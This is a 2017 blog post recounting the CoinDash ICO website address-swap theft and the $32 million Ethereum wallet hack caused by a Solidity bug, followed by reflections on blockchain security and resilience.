Last Week in Cryptocurrency Theft

Bobby Williams
Jul 22, 2017 · 5 min read

On Tuesday, someone stole $32 million worth of Ethereum cryptocurrency tokens. It was the largest cryptocurrency theft of the week, dwarfing the $10 million Ether stolen from the CoinDash Initial Coin Offering (ICO) on Monday.

In Monday’s case, the theft came just as CoinDash was opening its ICO — crypto’s version of a fundraising event. The intention was for cryptocurrency token traders to send CoinDash their Ether, in exchange for CoinDash tokens. What good are CoinDash tokens? Well, the idea is that cryptocurrency token traders can use them on CoinDash’s token trading platform to reward other token traders for sharing their insights on token trading. Set aside the question of whether that sounds like a reasonable investment; the thing to recognize here is that this ICO event was the debut of the CoinDash token.

Unfortunately for CoinDash, some hacker had compromised their website, and been waiting for the exact moment when the ICO launched. So, when CoinDash posted their Ethereum address on the web, to open the floodgates for investors to send them Ether, the hacker simply replaced that address with their own address. By the time this had been discovered, and the warning gone out, Ether worth $7 million at the time had already been sent to the hacker — later increasing to over $10 million worth as additional Ether trickled in. CoinDash is now eating that loss to make investors whole.

There have been smaller-scale losses relating to the misrepresentation of ICO addresses before, but the use of that trick in combination with the hacking of the website was a novel innovation. By contrast, the $32 million theft that happened on Tuesday was less “novel innovation” and more “suggestive of a critical weakness in the Ethereum ecosystem.”

In that case, the exploit was rooted in an esoteric design feature of the Solidity programming language that is used to code the “smart contracts” that are Ethereum’s raison d’etre. Haseeb Qureshi explains it pretty well here, if you want to know the details. Suffice it to say, the design of the programming language made it very easy to write a certain kind of bug, and that’s what a developer did. Unfortunately, this particular bug happened to be in a very important part of a contract distributed as part of a widely used project.

The code in question was part of a wallet — a contract built for holding Ether tokens. The bug enabled a hacker to change the ownership of the wallet, and then drain all the funds into one of their own accounts. Gavin Wood, the developer, didn’t notice this possibility when the code was written. In his defence, however, this code was being run by hundreds of people — many of whom would claim to be security experts — and nobody else noticed it either. At least until Ether started disappearing from wallets.

A startup called Swarm City was the first to notice when they lost $10 million worth of Ether from their wallet. In total, three wallets were stolen, containing $32 million worth of Ether tokens. That’s the bad news. The good news is that another $85 million that might have been stolen, wasn’t. Or rather, it was stolen by the good guys — the “White Hat Group” of hackers who recovered funds from wallet contracts that were at risk, using the same trick the thief was using. These funds are expected to be returned to their rightful owners.

The rest of that Ether is likely gone. While there are ways of tracing crypto tokens, consider that, the last time this much Ether was stolen from a janky smart contract — last year’s legendary attack on The DAO — nobody ever figured out who did it. Moreover, unlike what happened after The DAO, there will be no forking the Ethereum blockchain to undo the damage this time.

A Dash for the Timber, 1889 — Frederic Remington

Losses due to theft — ranging from small amounts on up into values of tens of millions of dollars — even hundreds of millions in the case of the Mt. Gox debacle — are an unfortunately common aspect of cryptocurrencies. While crypto-enthusiasts will go on at length about the security of blockchains, the security they are describing is fairly one-dimensional. Yes, blockchains can provide security needed to assure that tokens in an account can be moved once and only once. That’s important. Essential, actually. But, as these and other thefts have demonstrated, there are still a maddening variety of other moving parts within the digital currency ecosystem where security failures are both common and expensive. Until these issues are more effectively resolved, it’s probably for the best that this technology has yet to break through to mass adoption and the consumer market.

The good news for the crypto community, however, is that blockchain technology exhibits that quality known as “Antifragility.” Antifragility — a term coined by the economist Nassim Taleb — means that, when a system is attacked, it can recover from the attack stronger than it was before. For example, now that it has been demonstrated that the website of on ongoing ICO is a point of vulnerability through which tokens can be stolen, industry participants have taken notice and are changing their practices so that it will be significantly more difficult to accomplish a similar stunt in the future.

In the case of the Ether that was stolen as a result of the bug in Solidity code, there are already discussions underway about how the language can be changed to prevent this class of problem, and for mechanisms that can help to enable the recovery of funds in the event that a similar hijacking should occur in the future. While its becoming clear that — this being software — some level of bugs are inevitable, we are likely to see the establishment of better practices for finding these problems. This includes the broader institution of bug bounties — cash rewards to those who find and report security breaches in code before they can be exploited. It’s also likely that some type of insurance mechanism will emerge to enable the restoration of tokens to those who become the victims of this type of crime in the future.

Cryptocurrency thefts, like those that happened this past week, can cause a lot of damage. This includes financial damage to those who were directly affected, as well as reputational damage to the broader ecosystem. But they also demonstrate that there is still much about this tech that remains to be explored and understood. The world of blockchain technology has recovered from similar incidents in the past, and is more resilient today because of those experiences. That which does not kill it will make it stronger.

Software developer, writer, former officer of the U.N. Secretariat.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade